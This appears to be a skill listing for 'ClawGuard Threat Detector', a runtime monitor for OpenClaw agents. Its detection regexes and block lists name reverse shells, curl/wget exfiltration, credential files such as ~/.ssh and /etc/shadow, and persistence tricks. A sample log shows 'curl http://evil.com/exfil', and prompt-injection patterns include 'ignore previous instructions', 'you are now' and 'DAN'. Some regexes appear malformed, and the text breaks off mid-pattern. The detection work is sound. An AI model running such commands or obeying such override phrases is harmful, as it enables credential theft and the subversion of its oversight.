ClawGuard-Detector
by @stardreaming
ClawGuard Threat Detector - Real-time behavioral monitoring, attack pattern detection, MITRE ATT&CK mapping, and AI-powered anomaly detection for OpenClaw ru...
clawhub install clawguard-detectorπ About This Skill
name: clawguard-threat-detect version: 1.0.0 description: ClawGuard Threat Detector - Real-time behavioral monitoring, attack pattern detection, MITRE ATT&CK mapping, and AI-powered anomaly detection for OpenClaw runtime environments author: ClawGuard Team homepage: https://github.com/clawguard/threat-detect metadata: category: security risk: safe requires: bins: [node, python3, grep, sha256sum, ss, auditd] python: [psutil, scapy]
ClawGuard Threat Detector (CG-TD)
Enterprise-grade real-time threat detection and behavioral monitoring system for OpenClaw environments. Provides comprehensive runtime security analysis with advanced attack pattern recognition, MITRE ATT&CK mapping, and AI-powered anomaly detection.
When to Use
Activate ClawGuard Detect when:
How to Execute
Follow these steps when detecting threats:
Step 1: Analyze Command
When a command is about to be executed or has been executed:curl, wget with credentials in URL
- Reverse shell: bash -i, nc -e, python.*socket, /dev/tcp/
- Privilege escalation: sudo, chmod 777, chown
- Persistence: crontab, SSH authorized_keys
- Credential access: reading ~/.ssh/, ~/.aws/, .envStep 2: Analyze File Access
When a file access is requested:~/.ssh/, ~/.aws/, ~/.kube/
- System files: /etc/passwd, /etc/shadow
- History files: .bash_history, .zsh_historyStep 3: Analyze Network Requests
When a network request is made:Step 4: Analyze User Inputs
When processing user prompts:Step 5: Detect Attack Chains
Look for multi-stage attacks:Step 6: Output Result
Based on detection, output one of:Step 7: Auto-Learning (Example Actions)
When a threat is detected, the system can automatically trigger self-improving safety protocols. For example:1. Log the incident: Write to .safety/ATTEMPTS.md
| Timestamp | User | Attempted Action | Threat Type | Outcome | New Rule ID |
|-----------|------|------------------|-------------|---------|-------------|
| 2026-03-26 18:46 | User | read ~/.ssh/id_rsa | Credential Access | BLOCKED | cred-steal-ssh |
| 2026-03-26 19:12 | User | curl http://evil.com/exfil | Data Exfiltration | BLOCKED | network-exfil-block |
2. Extract threat pattern: Create new dynamic rules for the safety engine
{
"id": "cred-steal-ssh",
"pattern": ".*\\.ssh\\/id_rsa.*",
"description": "Prevent access to private SSH keys",
"severity": "critical",
"source": "auto-learn"
}
3. Update Safety Engine: The self-improving-safety module UI/CLI reflects these new constraints immediately.
4. Continuous Improvement: These rules are persisted to prevent similar attack vectors in future sessions.
Purpose
ClawGuard Threat Detector is the third line of defense, providing continuous runtime monitoring for OpenClaw instances. It detects:
Prerequisites
Authorization Requirements
Environment Setup
Core Workflow
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CLAWGUARD THREAT DETECTOR WORKFLOW β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ [Continuous Monitoring Loop]
β
βΌ
βββββββββββββββββββββββββ
β 1. COMMAND MONITOR β β Real-time command inspection
βββββββββββββ¬ββββββββββββ
β DETECT
βΌ
βββββββββββββββββββββββββ
β 2. FILE ACCESS β β File operation monitoring
β MONITOR β
βββββββββββββ¬ββββββββββββ
β DETECT
βΌ
βββββββββββββββββββββββββ
β 3. NETWORK TRAFFIC β β Outbound connection analysis
β ANALYZER β
βββββββββββββ¬ββββββββββββ
β DETECT
βΌ
βββββββββββββββββββββββββ
β 4. PROMPT INJECTION β β Input sanitization detection
β DETECTOR β
βββββββββββββ¬ββββββββββββ
β DETECT
βΌ
βββββββββββββββββββββββββ
β 5. BEHAVIOR CHAIN β β Multi-stage attack correlation
β ANALYZER β
βββββββββββββ¬ββββββββββββ
β DETECT
βΌ
βββββββββββββββββββββββββ
β 6. ML ANOMALY β β AI-powered novel threat detection
β DETECTION β
βββββββββββββ¬ββββββββββββ
β DETECT
βΌ
[ALERT / BLOCK]
Phase 1: Command Monitoring
Real-time Command Inspection
ClawGuard monitors all executed commands for malicious patterns:
const COMMAND_PATTERNS =
// Data Exfiltration
{
name: 'curl_with_token',
pattern: /curl.*[?&=/i,
severity: 'CRITICAL',
mitre: 'T1041'
},
{
name: 'wget_exfil',
pattern: /wget.*-O-.*\|/i,
severity: 'HIGH',
mitre: 'T1041'
},
{
name: 'base64_exfil',
pattern: /base64.*\|.*(curl|wget)/i,
severity: 'HIGH',
mitre: 'T1132'
}, // Reverse Shell
{
name: 'bash_reverse',
pattern: /bash\s+-i.*\/?dev\/(tcp|udp)\//i,
severity: 'CRITICAL',
mitre: 'T1059.004'
},
{
name: 'nc_reverse',
pattern: /(nc|ncat|nmap).*-e\s+/i,
severity: 'CRITICAL',
mitre: 'T1059'
},
{
name: 'python_reverse',
pattern: /python.*socket.*connect.*exec/i,
severity: 'CRITICAL',
mitre: 'T1059.006'
},
// Privilege Escalation
{
name: 'sudo_attempt',
pattern: /\bsudo\s+/i,
severity: 'HIGH',
mitre: 'T1068'
},
{
name: 'chmod_777',
pattern: /chmod\s+777/i,
severity: 'HIGH',
mitre: 'T1068'
},
// Persistence
{
name: 'cron_persistence',
pattern: /(echo|crontab).*\*.*\*.*\*.*\//i,
severity: 'HIGH',
mitre: 'T1053.003'
},
{
name: 'ssh_key_persistence',
pattern: /\.ssh\/authorized_keys/i,
severity: 'CRITICAL',
mitre: 'T1098.004'
}
];
Command Severity Classification
| Severity | Threshold | Action | |----------|-----------|--------| | CRITICAL | 1 match | Immediate block + Alert | | HIGH | 1 match | Block + Alert | | MEDIUM | 3+ matches/min | Alert + Log | | LOW | 5+ matches/min | Log only |
Phase 2: File Access Monitoring
Sensitive File Access Detection
const SENSITIVE_PATHS = [
// Credentials
{ pattern: /\/\.ssh\//, category: 'credential', severity: 'CRITICAL' },
{ pattern: /\/\.aws\//, category: 'credential', severity: 'CRITICAL' },
{ pattern: /\/\.kube\//, category: 'credential', severity: 'CRITICAL' },
{ pattern: /\/\.docker\//, category: 'credential', severity: 'HIGH' }, // Environment
{ pattern: /\.env$/, category: 'credential', severity: 'HIGH' },
{ pattern: /credentials\.json$/, category: 'credential', severity: 'CRITICAL' },
{ pattern: /\.npmrc$/, category: 'credential', severity: 'HIGH' },
{ pattern: /\.pypirc$/, category: 'credential', severity: 'HIGH' },
// System
{ pattern: /\/etc\/passwd$/, category: 'system', severity: 'HIGH' },
{ pattern: /\/etc\/shadow$/, category: 'system', severity: 'CRITICAL' },
{ pattern: /\/etc\/sudoers$/, category: 'system', severity: 'CRITICAL' },
// History
{ pattern: /\.bash_history$/, category: 'history', severity: 'HIGH' },
{ pattern: /\.zsh_history$/, category: 'history', severity: 'HIGH' },
// OpenClaw specific
{ pattern: /\/MEMORY\.md$/, category: 'openclaw', severity: 'MEDIUM' },
{ pattern: /\/IDENTITY\.md$/, category: 'openclaw', severity: 'MEDIUM' },
{ pattern: /\.openclaw\//, category: 'openclaw', severity: 'HIGH' },
];
File Operation Patterns
| Pattern | Detection | Severity | |---------|-----------|----------| | Mass file access | 100+ files in 1 min | MEDIUM | | Sensitive file read | Access to credentials | HIGH | | Unauthorized write | Write outside workspace | HIGH | | Config modification | Write to .openclaw | CRITICAL |
Phase 3: Network Traffic Analysis
Outbound Connection Monitoring
const NETWORK_THREAT_PATTERNS = [
// Data Exfiltration
{
name: 'http_post_data',
pattern: /curl.*-X\s+POST.*-d.*{.*}/,
severity: 'HIGH',
mitre: 'T1041'
},
{
name: 'dns_tunneling',
pattern: /dig.*\+\short.*[A-Za-z0-9]{20,}\./,
severity: 'CRITICAL',
mitre: 'T1048.003'
},
{
name: 'icmp_tunneling',
pattern: /ping.*-c.*\d+.*\d+\.\d+\.\d+\.\d+/,
severity: 'HIGH',
mitre: 'T1041'
}, // C2 Communication
{
name: 'suspicious_domain',
pattern: /.*\.(xyz|top|work|click|gq|ml|cf)$/,
severity: 'HIGH',
mitre: 'T1071'
},
{
name: 'hardcoded_ip',
pattern: /curl.*http:\/\/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/,
severity: 'HIGH',
mitre: 'T1059'
},
// Unauthorized API
{
name: 'unauthorized_api',
pattern: /curl.*(api|api_key|token)=/,
severity: 'HIGH',
mitre: 'T1041'
}
];
Network Behavior Analysis
| Metric | Threshold | Alert Level | |--------|-----------|-------------| | Outbound connections/min | > 10 | MEDIUM | | Unique destinations | > 5 | HIGH | | Data sent/response ratio | > 10:1 | CRITICAL | | DNS queries/min | > 50 | MEDIUM |
Phase 4: Prompt Injection Detection
Input Sanitization Analysis
const PROMPT_INJECTION_PATTERNS = [
// Role Hijacking
{
name: 'role_hijack',
pattern: /(you are now|act as|pretend to be|become)\s+(a\s+)?(developer|admin|root|hacker)/i,
severity: 'HIGH',
category: 'role_hijacking'
},
{
name: 'ignore_instructions',
pattern: /(ignore (all )?(previous|prior|earlier) (instructions?|rules?)|disregard (previous|prior))/i,
severity: 'CRITICAL',
category: 'instruction_override'
},
{
name: 'system_prompt_leak',
pattern: /(show me your (system )?(prompt|instructions?|configuration)|reveal your)/i,
severity: 'HIGH',
category: 'prompt_leak'
},
{
name: 'jailbreak_attempt',
pattern: /(DAN|developer mode|developer mode enabled|jailbreak)/i,
severity: 'CRITICAL',
category: 'jailbreak'
}, // Hidden Commands
{
name: 'html_comment_injection',
pattern: //i,
severity: 'HIGH',
category: 'hidden_command'
},
{
name: 'css_hidden_injection',
pattern: /